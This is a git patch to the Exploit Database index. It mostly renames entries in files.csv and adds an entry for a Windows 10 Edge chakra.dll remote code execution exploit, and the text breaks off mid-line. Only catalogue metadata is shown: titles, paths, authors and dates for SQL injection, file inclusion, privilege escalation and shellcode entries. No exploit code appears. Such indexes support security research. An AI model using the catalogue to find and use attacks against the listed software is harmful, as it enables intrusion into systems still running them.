From 127a1da37b3b90ac47a1e89ad73171dfa0f76ce2 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 6 Jan 2017 05:01:17 +0000 Subject: [PATCH] DB: 2017-01-06 1 new exploits EvansFTP - (EvansFTP.ocx) Remote Buffer Overflow (PoC) EvansFTP - 'EvansFTP.ocx' Remote Buffer Overflow (PoC) Kaspersky 17.0.0 - Local CA root is Incorrectly Protected Kaspersky 17.0.0 - Local CA root Incorrectly Protected CoolPlayer 2.19 - (.Skin) Local Buffer Overflow (Python) CUPS < 1.3.8-4 - (pstopdf filter) Privilege Escalation CoolPlayer 2.19 - '.Skin' Local Buffer Overflow (Python) CUPS < 1.3.8-4 - Privilege Escalation Evans FTP - 'EvansFTP.ocx' ActiveX Control Multiple Remote Buffer Overflow Vulnerabilities Microsoft Windows 10 Edge - 'chakra.dll' Info Leak / Type Confusion Remote Code Execution Phpclanwebsite 1.23.1 - (par) SQL Injection Phpclanwebsite 1.23.1 - SQL Injection Nukedit CMS 4.9.6 - Unauthorized Admin Add Nukedit 4.9.6 - Unauthorized Admin Add iyzi Forum 1.0 Beta 3 - (uye_ayrinti.asp) SQL Injection iyzi Forum 1.0 Beta 3 - SQL Injection Liberum Help Desk 0.97.3 - (details.asp) SQL Injection Liberum Help Desk 0.97.3 - SQL Injection Pligg 9.9.0 - Remote Code Execution Pligg 9.9.0 - Cross-Site Scripting / Local File Inclusion / SQL Injection Pligg CMS 9.9.0 - Remote Code Execution Pligg CMS 9.9.0 - Cross-Site Scripting / Local File Inclusion / SQL Injection CF_Auction - (forummessage) Blind SQL Injection CFMBLOG - 'index.cfm categorynbr' Blind SQL Injection CF_Auction - Blind SQL Injection CFMBLOG - 'categorynbr' Parameter Blind SQL Injection phpAddEdit 1.3 - (editform) Local File Inclusion phpAddEdit 1.3 - 'editform' Parameter Local File Inclusion MyCal Personal Events Calendar - 'mycal.mdb' Database Disclosure MyCal Personal Events Calendar - Database Disclosure Affiliate Software Java 4.0 - (Authentication Bypass) SQL Injection Ad Management Java - (Authentication Bypass) SQL Injection Banner Exchange Java - (Authentication Bypass) SQL Injection Affiliate Software Java 4.0 - Authentication Bypass Ad Management Java - Authentication Bypass Banner Exchange Java - Authentication Bypass ASP-CMS 1.0 - (index.asp cha) SQL Injection SUMON 0.7.0 - (chg.php host) Command Execution Xpoze 4.10 - (home.html menu) Blind SQL Injection Social Groupie - 'group_index.php id' SQL Injection ASP-CMS 1.0 - 'cha' Parameter SQL Injection SUMON 0.7.0 - Command Execution Xpoze 4.10 - 'menu' Parameter Blind SQL Injection Social Groupie - 'id' Parameter SQL Injection Umer Inc Songs Portal Script - 'id' SQL Injection Umer Inc Songs Portal Script - 'id' Parameter SQL Injection ASPired2Quote - 'quote.mdb' Remote Database Disclosure ASP-DEV Internal E-Mail System - (Authentication Bypass) SQL Injection ASPired2Quote - Remote Database Disclosure ASP-DEV Internal E-Mail System - Authentication Bypass iyzi Forum 1.0b3 - (iyziforum.mdb) Database Disclosure CodeAvalanche FreeForum - 'CAForum.mdb' Database Disclosure iyzi Forum 1.0b3 - Database Disclosure CodeAvalanche FreeForum - Database Disclosure FLDS 1.2a - (redir.php id) SQL Injection FLDS 1.2a - 'redir.php' SQL Injection Mediatheka 4.2 - (index.php lang) Local File Inclusion Mediatheka 4.2 - 'lang' Parameter Local File Inclusion Forest Blog 1.3.2 - (blog.mdb) Remote Database Disclosure CodeAvalanche Directory - 'CADirectory.mdb' Database Disclosure CodeAvalanche FreeForAll - 'CAFFAPage.mdb' Database Disclosure Forest Blog 1.3.2 - Remote Database Disclosure CodeAvalanche Directory - Database Disclosure CodeAvalanche FreeForAll - Database Disclosure CodeAvalanche Articles - 'CAArticles.mdb' Database Disclosure CodeAvalanche RateMySite - 'CARateMySite.mdb' Database Disclosure CodeAvalanche Articles - Database Disclosure CodeAvalanche RateMySite - Database Disclosure FLDS 1.2a - (lpro.php id) SQL Injection BabbleBoard 1.1.6 - 'Username' Cross-Site Request Forgery/Cookie Grabber Exploit FLDS 1.2a - 'lpro.php' SQL Injection BabbleBoard 1.1.6 - Cross-Site Request Forgery/Cookie Grabber Exploit The Rat CMS Alpha 2 - (Authentication Bypass) SQL Injection XOOPS Module Amevents - 'print.php id' SQL Injection CadeNix - 'cid' SQL Injection The Rat CMS Alpha 2 - Authentication Bypass XOOPS Module Amevents - SQL Injection CadeNix - SQL Injection CFAGCMS 1 - 'right.php title' SQL Injection CFAGCMS 1 - SQL Injection FaScript FaUpload - 'download.php' SQL Injection Web Wiz Guestbook 8.21 - (WWGGuestbook.mdb) DD FLDS 1.2a - report.php (linkida) SQL Injection FaScript FaUpload - SQL Injection Web Wiz Guestbook 8.21 - Database Disclosure FLDS 1.2a - 'report.php' SQL Injection Gnews Publisher .NET - (authors.asp authorID) SQL Injection Gnews Publisher .NET - SQL Injection Joomla! Component Tech Article 1.x - (item) SQL Injection TinyMCE 2.0.1 - (index.php menuID) SQL Injection Joomla! Component Tech Article 1.x - SQL Injection TinyMCE 2.0.1 - 'menuID' Parameter SQL Injection QuickerSite Easy CMS - 'QuickerSite.mdb' Database Disclosure QuickerSite Easy CMS - Database Disclosure I-Rater Basic - 'messages.php' SQL Injection I-Rater Basic - SQL Injection Injader CMS 2.1.1 - 'id' SQL Injection Injader CMS 2.1.1 - 'id' Parameter SQL Injection MyPHPsite - 'index.php mod' Local File Inclusion MyPBS - 'index.php seasonID' SQL Injection MyPHPsite - Local File Inclusion MyPBS - 'seasonID' Parameter SQL Injection Extract Website - 'download.php Filename' File Disclosure Extract Website - 'Filename' Parameter File Disclosure FreeLyrics 1.0 - (source.php p) Remote File Disclosure FreeLyrics 1.0 - Remote File Disclosure Userlocator 3.0 - (y) Blind SQL Injection Userlocator 3.0 - Blind SQL Injection chicomas 2.0.4 - Database Backup / File Disclosure / Cross-Site Scripting Chicomas 2.0.4 - Database Backup / File Disclosure / Cross-Site Scripting BLOG 1.55B - (image_upload.php) Arbitrary File Upload BLOG 1.55B - 'image_upload.php' Arbitrary File Upload RSS Simple News - 'news.php pid' SQL Injection Text Lines Rearrange Script - 'Filename' File Disclosure RSS Simple News - SQL Injection Text Lines Rearrange Script - 'Filename' Parameter File Disclosure Pligg 9.9.5b - (check_url.php url) Arbitrary File Upload / SQL Injection Pligg 9.9.5b - Arbitrary File Upload / SQL Injection Joomla! Component Volunteer 2.0 - (job_id) SQL Injection Joomla! Component Volunteer 2.0 - SQL Injection Calendar Script 1.1 - (Authentication Bypass) SQL Injection REDPEACH CMS - (zv) SQL Injection Calendar Script 1.1 - Authentication Bypass REDPEACH CMS - SQL Injection PHPLD 3.3 - (page.php name) Blind SQL Injection PHPLD 3.3 - Blind SQL Injection The Rat CMS Alpha 2 - 'viewarticle.php id' Blind SQL Injection The Rat CMS Alpha 2 - Blind SQL Injection Pligg 9.9.5 - Cross-Site Request Forgery / Protection Bypass / Captcha Bypass Pligg CMS 9.9.5 - Cross-Site Request Forgery / Protection Bypass / Captcha Bypass Flatnux 2009-01-27 - (Job fields) Cross-Site Scripting / Iframe Injection (PoC) Flatnux 2009-01-27 - Cross-Site Scripting / Iframe Injection (PoC) flatnux 2009-01-27 - Remote File Inclusion Flatnux 2009-01-27 - Remote File Inclusion flatnux 2009-03-27 - Arbitrary File Upload / Information Disclosure Flatnux 2009-03-27 - Arbitrary File Upload / Information Disclosure Pligg 9.9.0 - (editlink.php id) Blind SQL Injection Pligg CMS 9.9.0 - 'editlink.php' Blind SQL Injection CF Shopkart 5.3x - 'itemID' SQL Injection CF Shopkart 5.3x - 'itemID' Parameter SQL Injection worksimple_1.3.2 - Multiple Vulnerabilities WorkSimple 1.3.2 - Multiple Vulnerabilities Pligg 1.1.2 - Blind SQL Injection / Cross-Site Scripting Pligg CMS 1.1.2 - Blind SQL Injection / Cross-Site Scripting Constructr CMS 3.03 - MultipleRemote Vulnerabilities Constructr CMS 3.03 - Multiple Remote Vulnerabilities Pligg 1.1.4 - SQL Injection Pligg CMS 1.1.4 - SQL Injection phpLDAPadmin 1.2.1.1 - (query_engine) Remote PHP Code Injection (1) phpLDAPadmin 1.2.1.1 - Remote PHP Code Injection (1) phpLDAPadmin 1.2.1.1 - (query_engine) Remote PHP Code Injection (Metasploit) (2) phpLDAPadmin 1.2.1.1 - Remote PHP Code Injection (Metasploit) (2) OneOrZero Helpdesk 1.4 - TUpdate.php SQL Injection OneOrZero Helpdesk 1.4 - install.php Administrative Access OneOrZero Helpdesk 1.4 - 'TUpdate.php' SQL Injection OneOrZero Helpdesk 1.4 - 'install.php' Administrative Access phpLDAPadmin 0.9.6/0.9.7 - welcome.php custom_welcome_page Variable Arbitrary File Inclusion phpLDAPadmin 0.9.6/0.9.7 - 'welcome.php' Arbitrary File Inclusion phpLDAPadmin 0.9.8 - compare_form.php dn Parameter Cross-Site Scripting phpLDAPadmin 0.9.8 - copy_form.php dn Parameter Cross-Site Scripting phpLDAPadmin 0.9.8 - rename_form.php dn Parameter Cross-Site Scripting phpLDAPadmin 0.9.8 - 'compare_form.php' Cross-Site Scripting phpLDAPadmin 0.9.8 - 'copy_form.php' Cross-Site Scripting phpLDAPadmin 0.9.8 - 'rename_form.php' Cross-Site Scripting phpLDAPadmin 0.9.8 - search.php scope Parameter Cross-Site Scripting phpLDAPadmin 0.9.8 - template_engine.php Multiple Parameter Cross-Site Scripting phpLDAPadmin 0.9.8 - 'search.php' Cross-Site Scripting phpLDAPadmin 0.9.8 - 'template_engine.php' Cross-Site Scripting Pligg 9.5 - Reset Forgotten Password Security Bypass Pligg CMS 9.5 - Reset Forgotten Password Security Bypass Click&BaneX - Details.asp SQL Injection Click&BaneX - 'Details.asp' SQL Injection ChiCoMaS 2.0.4 - 'index.php' Cross-Site Scripting Chicomas 2.0.4 - 'index.php' Cross-Site Scripting Pligg 9.9.5 - 'CAPTCHA' Registration Automation Security Bypass Pligg CMS 9.9.5 - 'CAPTCHA' Registration Automation Security Bypass Pligg 1.0.4 - 'search.php' Cross-Site Scripting Pligg CMS 1.0.4 - 'search.php' Cross-Site Scripting Pligg 2.0.1 - Multiple Vulnerabilities Pligg CMS 2.0.1 - Multiple Vulnerabilities Open Journal Systems (OJS) 2.3.6 - /lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/ibrowser.php Multiple Parameter Cross-Site Scripting Open Journal Systems (OJS) 2.3.6 - /lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/rfiles.php Multiple Function Traversal Arbitrary File Manipulation Open Journal Systems (OJS) 2.3.6 - 'rfiles.php' Traversal Arbitrary File Manipulation FlatnuX CMS - controlcenter.php contents/Files Action dir Parameter Traversal Arbitrary File Access FlatnuX CMS - Traversal Arbitrary File Access Atlassian Confluence Jira 5.9.12 - Persistent Cross-Site Scripting Atlassian Confluence 5.9.12 - Persistent Cross-Site Scripting --- files.csv | 187 ++++++++++++++-------------- platforms/php/webapps/36998.txt | 15 --- platforms/php/webapps/6172.pl | 8 +- platforms/windows/remote/32661.html | 7 -- platforms/windows/remote/40990.txt | 20 +++ 5 files changed, 117 insertions(+), 120 deletions(-) delete mode 100755 platforms/php/webapps/36998.txt delete mode 100755 platforms/windows/remote/32661.html create mode 100755 platforms/windows/remote/40990.txt diff --git a/files.csv b/files.csv index eb25b0c4e..ea8b662d6 100644 --- a/files.csv +++ b/files.csv @@ -875,7 +875,7 @@ id,file,description,date,author,platform,type,port 7405,platforms/linux/dos/7405.c,"Linux Kernel 2.6.27.8 - ATMSVC Local Denial of Service",2008-12-10,"Jon Oberheide",linux,dos,0 7431,platforms/windows/dos/7431.pl,"Microsoft Visual Basic - ActiveX Controls mscomct2.ocx Buffer Overflow (PoC)",2008-12-12,"Jerome Athias",windows,dos,0 7454,platforms/linux/dos/7454.c,"Linux Kernel 2.6.27.7-generic / 2.6.18 / 2.6.24-1 - Local Denial of Service",2008-12-14,Adurit-T,linux,dos,0 -7460,platforms/windows/dos/7460.html,"EvansFTP - (EvansFTP.ocx) Remote Buffer Overflow (PoC)",2008-12-14,Bl@ckbe@rD,windows,dos,0 +7460,platforms/windows/dos/7460.html,"EvansFTP - 'EvansFTP.ocx' Remote Buffer Overflow (PoC)",2008-12-14,Bl@ckbe@rD,windows,dos,0 7467,platforms/multiple/dos/7467.txt,"Amaya Web Browser 10.0.1/10.1-pre5 - (html tag) Buffer Overflow (PoC)",2008-12-15,webDEViL,multiple,dos,0 7520,platforms/multiple/dos/7520.c,"Avahi < 0.6.24 - (mDNS Daemon) Remote Denial of Service",2008-12-19,"Jon Oberheide",multiple,dos,0 7535,platforms/hardware/dos/7535.php,"Linksys WAG54G v2 (Wireless ADSL Router) - httpd Denial of Service",2008-12-21,r0ut3r,hardware,dos,0 @@ -5925,7 +5925,7 @@ id,file,description,date,author,platform,type,port 7135,platforms/windows/local/7135.htm,"Opera 9.62 - 'file://' Local Heap Overflow",2008-11-17,"Guido Landi",windows,local,0 7171,platforms/multiple/local/7171.txt,"PHP 5.2.6 - (error_log) Safe_mode Bypass",2008-11-20,SecurityReason,multiple,local,0 7177,platforms/linux/local/7177.c,"Oracle Database Vault - ptrace(2) Privilege Escalation",2008-11-20,"Jakub Wartak",linux,local,0 -40988,platforms/windows/local/40988.c,"Kaspersky 17.0.0 - Local CA root is Incorrectly Protected",2017-01-04,"Google Security Research",windows,local,0 +40988,platforms/windows/local/40988.c,"Kaspersky 17.0.0 - Local CA root Incorrectly Protected",2017-01-04,"Google Security Research",windows,local,0 7264,platforms/windows/local/7264.txt,"Apache Tomcat (Windows) - runtime.getRuntime().exec() Privilege Escalation",2008-11-28,Abysssec,windows,local,0 7309,platforms/windows/local/7309.pl,"Cain & Abel 4.9.24 - '.rdp' Stack Overflow",2008-11-30,SkD,windows,local,0 7313,platforms/linux/local/7313.sh,"Debian - (symlink attack in login) Arbitrary File Ownership (PoC)",2008-12-01,"Paul Szabo",linux,local,0 @@ -5939,8 +5939,8 @@ id,file,description,date,author,platform,type,port 7516,platforms/windows/local/7516.txt,"ESET Smart Security 3.0.672 - 'epfw.sys' Privilege Escalation",2008-12-18,"NT Internals",windows,local,0 7533,platforms/windows/local/7533.txt,"PowerStrip 3.84 - 'pstrip.sys' Privilege Escalation",2008-12-21,"NT Internals",windows,local,0 7536,platforms/windows/local/7536.cpp,"CoolPlayer 2.19 - '.Skin' Local Buffer Overflow",2008-12-21,r0ut3r,windows,local,0 -7547,platforms/windows/local/7547.py,"CoolPlayer 2.19 - (.Skin) Local Buffer Overflow (Python)",2008-12-22,Encrypt3d.M!nd,windows,local,0 -7550,platforms/multiple/local/7550.c,"CUPS < 1.3.8-4 - (pstopdf filter) Privilege Escalation",2008-12-22,"Jon Oberheide",multiple,local,0 +7547,platforms/windows/local/7547.py,"CoolPlayer 2.19 - '.Skin' Local Buffer Overflow (Python)",2008-12-22,Encrypt3d.M!nd,windows,local,0 +7550,platforms/multiple/local/7550.c,"CUPS < 1.3.8-4 - Privilege Escalation",2008-12-22,"Jon Oberheide",multiple,local,0 7577,platforms/windows/local/7577.pl,"Acoustica Mixcraft 4.2 - Universal Stack Overflow (SEH)",2008-12-24,SkD,windows,local,0 7581,platforms/freebsd/local/7581.c,"FreeBSD 6x/7 - protosw kernel Local Privilege Escalation Exploit",2008-12-28,"Don Bailey",freebsd,local,0 7582,platforms/windows/local/7582.py,"IntelliTamper 2.07/2.08 - '.map' Local Overwrite (SEH)",2008-12-28,Cnaph,windows,local,0 @@ -14083,7 +14083,6 @@ id,file,description,date,author,platform,type,port 32618,platforms/php/remote/32618.txt,"plexusCMS 0.5 - Cross-Site Scripting / Remote Shell / Credentials Leak",2014-03-31,neglomaniac,php,remote,0 32643,platforms/windows/remote/32643.txt,"PhonerLite 2.14 SIP Soft Phone - SIP Digest Disclosure",2014-04-01,"Jason Ostrom",windows,remote,5060 32654,platforms/windows/remote/32654.txt,"Microsoft Internet Explorer 8 - CSS 'expression' Property Cross-Site Scripting Filter Bypass",2008-12-11,"Rafel Ivgi",windows,remote,0 -32661,platforms/windows/remote/32661.html,"Evans FTP - 'EvansFTP.ocx' ActiveX Control Multiple Remote Buffer Overflow Vulnerabilities",2008-12-14,Bl@ckbe@rD,windows,remote,0 32673,platforms/multiple/remote/32673.java,"GNU Classpath 0.97.2 - 'gnu.java.security.util.PRNG' Class Entropy Weakness (1)",2008-12-05,"Jack Lloyd",multiple,remote,0 32674,platforms/multiple/remote/32674.cpp,"GNU Classpath 0.97.2 - 'gnu.java.security.util.PRNG' Class Entropy Weakness (2)",2008-12-05,"Jack Lloyd",multiple,remote,0 32681,platforms/hardware/remote/32681.txt,"COMTREND CT-536 / HG-536 Routers - Multiple Remote Vulnerabilities",2008-12-22,"Daniel Fernandez Bleda",hardware,remote,0 @@ -15200,6 +15199,7 @@ id,file,description,date,author,platform,type,port 40949,platforms/cgi/remote/40949.rb,"NETGEAR WNR2000v5 - Remote Code Execution",2016-12-21,"Pedro Ribeiro",cgi,remote,80 40963,platforms/linux/remote/40963.txt,"OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading",2016-12-23,"Google Security Research",linux,remote,22 40984,platforms/windows/remote/40984.py,"Internet Download Accelerator 6.10.1.1527 - FTP Buffer Overflow (SEH)",2017-01-02,"Fady Mohammed Osman",windows,remote,0 +40990,platforms/windows/remote/40990.txt,"Microsoft Windows 10 Edge - 'chakra.dll' Info Leak / Type Confusion Remote Code Execution",2017-01-05,"Brian Pak",windows,remote,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 @@ -16028,7 +16028,7 @@ id,file,description,date,author,platform,type,port 1419,platforms/asp/webapps/1419.pl,"MiniNuke 1.8.2 - 'hid' Parameter SQL Injection",2006-01-14,DetMyl,asp,webapps,0 1442,platforms/php/webapps/1442.pl,"EZDatabase 2.0 - (db_id) Remote Command Execution",2006-01-22,cijfer,php,webapps,0 1446,platforms/php/webapps/1446.pl,"creLoaded 6.15 - (HTMLAREA) Automated Perl Exploit",2006-01-24,kaneda,php,webapps,0 -1453,platforms/php/webapps/1453.pl,"Phpclanwebsite 1.23.1 - (par) SQL Injection",2006-01-25,matrix_killer,php,webapps,0 +1453,platforms/php/webapps/1453.pl,"Phpclanwebsite 1.23.1 - SQL Injection",2006-01-25,matrix_killer,php,webapps,0 1457,platforms/php/webapps/1457.txt,"phpBB 2.0.19 - Cross-Site Scripting Remote Cookie Disclosure",2006-01-29,threesixthousan,php,webapps,0 1459,platforms/php/webapps/1459.pl,"xeCMS 1.0.0 RC 2 - 'cookie' Remote Command Execution",2006-01-30,cijfer,php,webapps,0 1461,platforms/php/webapps/1461.pl,"Invision Power Board Dragoran Portal Mod 1.3 - SQL Injection",2006-01-31,SkOd,php,webapps,0 @@ -16251,7 +16251,7 @@ id,file,description,date,author,platform,type,port 1847,platforms/php/webapps/1847.txt,"CosmicShoppingCart - 'search.php' SQL Injection",2006-05-28,Vympel,php,webapps,0 1848,platforms/php/webapps/1848.txt,"Fastpublish CMS 1.6.9 - config[fsBase] Remote File Inclusion",2006-05-29,Kacper,php,webapps,0 1849,platforms/asp/webapps/1849.htm,"Speedy ASP Forum - 'profileupdate.asp' User Pass Change Exploit",2006-05-29,ajann,asp,webapps,0 -1850,platforms/asp/webapps/1850.htm,"Nukedit CMS 4.9.6 - Unauthorized Admin Add",2006-05-29,FarhadKey,asp,webapps,0 +1850,platforms/asp/webapps/1850.htm,"Nukedit 4.9.6 - Unauthorized Admin Add",2006-05-29,FarhadKey,asp,webapps,0 1851,platforms/php/webapps/1851.txt,"gnopaste 0.5.3 - 'common.php' Remote File Inclusion",2006-05-30,SmokeZ,php,webapps,0 1853,platforms/php/webapps/1853.php,"pppBlog 0.3.8 - System Disclosure",2006-05-31,rgod,php,webapps,0 1854,platforms/php/webapps/1854.txt,"Ottoman CMS 1.1.3 - '?default_path=' Remote File Inclusion (1)",2006-05-31,Kacper,php,webapps,0 @@ -16669,7 +16669,7 @@ id,file,description,date,author,platform,type,port 2420,platforms/php/webapps/2420.txt,"ZoomStats 1.0.2 - 'mysql.php' Remote File Inclusion",2006-09-24,Drago84,php,webapps,0 2421,platforms/asp/webapps/2421.pl,"Spidey Blog Script 1.5 - 'proje_goster.asp' SQL Injection (2)",2006-09-24,gega,asp,webapps,0 2422,platforms/php/webapps/2422.txt,"Advaced-Clan-Script 3.4 - (mcf.php) Remote File Inclusion",2006-09-24,xdh,php,webapps,0 -2423,platforms/asp/webapps/2423.txt,"iyzi Forum 1.0 Beta 3 - (uye_ayrinti.asp) SQL Injection",2006-09-24,"Fix TR",asp,webapps,0 +2423,platforms/asp/webapps/2423.txt,"iyzi Forum 1.0 Beta 3 - SQL Injection",2006-09-24,"Fix TR",asp,webapps,0 2424,platforms/php/webapps/2424.txt,"SyntaxCMS 1.3 - (0004_init_urls.php) Remote File Inclusion",2006-09-24,MoHaJaLi,php,webapps,0 2427,platforms/php/webapps/2427.txt,"Polaring 0.04.03 - (general.php) Remote File Inclusion",2006-09-25,Drago84,php,webapps,0 2428,platforms/php/webapps/2428.txt,"PBLang 4.66z - (temppath) Remote File Inclusion",2006-09-25,SHiKaA,php,webapps,0 @@ -16995,7 +16995,7 @@ id,file,description,date,author,platform,type,port 2842,platforms/php/webapps/2842.php,"Woltlab Burning Board Lite 1.0.2 - Blind SQL Injection",2006-11-23,rgod,php,webapps,0 2843,platforms/php/webapps/2843.pl,"PHP-Nuke NukeAI Module 3b - 'util.php' Remote File Inclusion",2006-11-24,DeltahackingTEAM,php,webapps,0 2844,platforms/php/webapps/2844.pl,"Cahier de texte 2.0 - (Database Backup/Source Disclosure) Remote Exploit",2006-11-24,DarkFig,php,webapps,0 -2846,platforms/asp/webapps/2846.txt,"Liberum Help Desk 0.97.3 - (details.asp) SQL Injection",2006-11-25,ajann,asp,webapps,0 +2846,platforms/asp/webapps/2846.txt,"Liberum Help Desk 0.97.3 - SQL Injection",2006-11-25,ajann,asp,webapps,0 2847,platforms/php/webapps/2847.txt,"Sisfo Kampus 0.8 - Remote File Inclusion / Download",2006-11-25,"Wawan Firmansyah",php,webapps,0 2848,platforms/asp/webapps/2848.txt,"Basic Forum 1.1 - (edit.asp) SQL Injection",2006-11-25,bolivar,asp,webapps,0 2849,platforms/asp/webapps/2849.txt,"ASP-Nuke Community 1.5 - Cookie Privilege Escalation",2006-11-25,ajann,asp,webapps,0 @@ -19274,8 +19274,8 @@ id,file,description,date,author,platform,type,port 6169,platforms/php/webapps/6169.txt,"PozScripts Classified Ads Script - 'cid' Parameter SQL Injection",2008-07-30,"Hussin X",php,webapps,0 6170,platforms/php/webapps/6170.txt,"TubeGuru Video Sharing Script - 'UID' Parameter SQL Injection",2008-07-30,"Hussin X",php,webapps,0 6171,platforms/php/webapps/6171.pl,"eNdonesia 8.4 (Calendar Module) - SQL Injection",2008-07-30,Jack,php,webapps,0 -6172,platforms/php/webapps/6172.pl,"Pligg 9.9.0 - Remote Code Execution",2008-07-30,"GulfTech Security",php,webapps,0 -6173,platforms/php/webapps/6173.txt,"Pligg 9.9.0 - Cross-Site Scripting / Local File Inclusion / SQL Injection",2008-07-30,"GulfTech Security",php,webapps,0 +6172,platforms/php/webapps/6172.pl,"Pligg CMS 9.9.0 - Remote Code Execution",2008-07-30,"GulfTech Security",php,webapps,0 +6173,platforms/php/webapps/6173.txt,"Pligg CMS 9.9.0 - Cross-Site Scripting / Local File Inclusion / SQL Injection",2008-07-30,"GulfTech Security",php,webapps,0 6176,platforms/php/webapps/6176.txt,"PHPX 3.5.16 - Cookie Poisoning / Login Bypass",2008-07-31,gnix,php,webapps,0 6177,platforms/php/webapps/6177.php,"Symphony 1.7.01 - (non-patched) Remote Code Execution",2008-07-31,Raz0r,php,webapps,0 6178,platforms/php/webapps/6178.php,"Coppermine Photo Gallery 1.4.18 - Local File Inclusion / Remote Code Execution",2008-07-31,EgiX,php,webapps,0 @@ -20216,127 +20216,127 @@ id,file,description,date,author,platform,type,port 7411,platforms/php/webapps/7411.txt,"Butterfly ORGanizer 2.0.1 - 'id' Parameter SQL Injection",2008-12-10,Osirys,php,webapps,0 7412,platforms/asp/webapps/7412.txt,"cf shopkart 5.2.2 - SQL Injection / File Disclosure",2008-12-10,AlpHaNiX,asp,webapps,0 7413,platforms/asp/webapps/7413.pl,"CF_Calendar - 'calendarevent.cfm' SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0 -7414,platforms/asp/webapps/7414.txt,"CF_Auction - (forummessage) Blind SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0 -7415,platforms/asp/webapps/7415.txt,"CFMBLOG - 'index.cfm categorynbr' Blind SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0 +7414,platforms/asp/webapps/7414.txt,"CF_Auction - Blind SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0 +7415,platforms/asp/webapps/7415.txt,"CFMBLOG - 'categorynbr' Parameter Blind SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0 7416,platforms/asp/webapps/7416.txt,"CF_Forum - Blind SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0 -7417,platforms/php/webapps/7417.txt,"phpAddEdit 1.3 - (editform) Local File Inclusion",2008-12-10,nuclear,php,webapps,0 +7417,platforms/php/webapps/7417.txt,"phpAddEdit 1.3 - 'editform' Parameter Local File Inclusion",2008-12-10,nuclear,php,webapps,0 7418,platforms/php/webapps/7418.txt,"PhpAddEdit 1.3 - 'cookie' Login Bypass",2008-12-11,x0r,php,webapps,0 7419,platforms/asp/webapps/7419.txt,"evCal Events Calendar - Database Disclosure",2008-12-11,Cyber-Zone,asp,webapps,0 -7420,platforms/asp/webapps/7420.txt,"MyCal Personal Events Calendar - 'mycal.mdb' Database Disclosure",2008-12-11,CoBRa_21,asp,webapps,0 +7420,platforms/asp/webapps/7420.txt,"MyCal Personal Events Calendar - Database Disclosure",2008-12-11,CoBRa_21,asp,webapps,0 7421,platforms/php/webapps/7421.txt,"EZ Publish 3.9.0/3.9.5/3.10.1 - Command Execution (Admin Required)",2008-12-11,s4avrd0w,php,webapps,0 7422,platforms/php/webapps/7422.txt,"Feed CMS 1.07.03.19b - 'lang' Local File Inclusion",2008-12-11,x0r,php,webapps,0 -7423,platforms/asp/webapps/7423.txt,"Affiliate Software Java 4.0 - (Authentication Bypass) SQL Injection",2008-12-11,R3d-D3V!L,asp,webapps,0 -7424,platforms/asp/webapps/7424.txt,"Ad Management Java - (Authentication Bypass) SQL Injection",2008-12-11,R3d-D3V!L,asp,webapps,0 -7425,platforms/asp/webapps/7425.txt,"Banner Exchange Java - (Authentication Bypass) SQL Injection",2008-12-11,R3d-D3V!L,asp,webapps,0 +7423,platforms/asp/webapps/7423.txt,"Affiliate Software Java 4.0 - Authentication Bypass",2008-12-11,R3d-D3V!L,asp,webapps,0 +7424,platforms/asp/webapps/7424.txt,"Ad Management Java - Authentication Bypass",2008-12-11,R3d-D3V!L,asp,webapps,0 +7425,platforms/asp/webapps/7425.txt,"Banner Exchange Java - Authentication Bypass",2008-12-11,R3d-D3V!L,asp,webapps,0 7426,platforms/php/webapps/7426.txt,"PHP Support Tickets 2.2 - Arbitrary File Upload",2008-12-11,ahmadbady,php,webapps,0 7427,platforms/asp/webapps/7427.txt,"The Net Guys ASPired2Poll - Remote Database Disclosure",2008-12-11,AlpHaNiX,asp,webapps,0 7428,platforms/asp/webapps/7428.txt,"The Net Guys ASPired2Protect - Database Disclosure",2008-12-12,AlpHaNiX,asp,webapps,0 -7429,platforms/asp/webapps/7429.txt,"ASP-CMS 1.0 - (index.asp cha) SQL Injection",2008-12-12,"Khashayar Fereidani",asp,webapps,0 -7430,platforms/php/webapps/7430.txt,"SUMON 0.7.0 - (chg.php host) Command Execution",2008-12-12,dun,php,webapps,0 -7432,platforms/php/webapps/7432.txt,"Xpoze 4.10 - (home.html menu) Blind SQL Injection",2008-12-12,XaDoS,php,webapps,0 -7433,platforms/php/webapps/7433.txt,"Social Groupie - 'group_index.php id' SQL Injection",2008-12-12,InjEctOr5,php,webapps,0 +7429,platforms/asp/webapps/7429.txt,"ASP-CMS 1.0 - 'cha' Parameter SQL Injection",2008-12-12,"Khashayar Fereidani",asp,webapps,0 +7430,platforms/php/webapps/7430.txt,"SUMON 0.7.0 - Command Execution",2008-12-12,dun,php,webapps,0 +7432,platforms/php/webapps/7432.txt,"Xpoze 4.10 - 'menu' Parameter Blind SQL Injection",2008-12-12,XaDoS,php,webapps,0 +7433,platforms/php/webapps/7433.txt,"Social Groupie - 'id' Parameter SQL Injection",2008-12-12,InjEctOr5,php,webapps,0 7434,platforms/php/webapps/7434.sh,"Wysi Wiki Wyg 1.0 - Remote Password Retrieve Exploit",2008-12-12,StAkeR,php,webapps,0 7435,platforms/php/webapps/7435.txt,"Social Groupie - 'create_album.php' Arbitrary File Upload",2008-12-12,InjEctOr5,php,webapps,0 7436,platforms/asp/webapps/7436.txt,"the net guys aspired2blog - SQL Injection / File Disclosure",2008-12-12,Pouya_Server,asp,webapps,0 7437,platforms/php/webapps/7437.txt,"Moodle 1.9.3 - Remote Code Execution",2008-12-12,USH,php,webapps,0 7438,platforms/asp/webapps/7438.txt,"VP-ASP Shopping Cart 6.50 - Database Disclosure",2008-12-12,Dxil,asp,webapps,0 -7439,platforms/php/webapps/7439.txt,"Umer Inc Songs Portal Script - 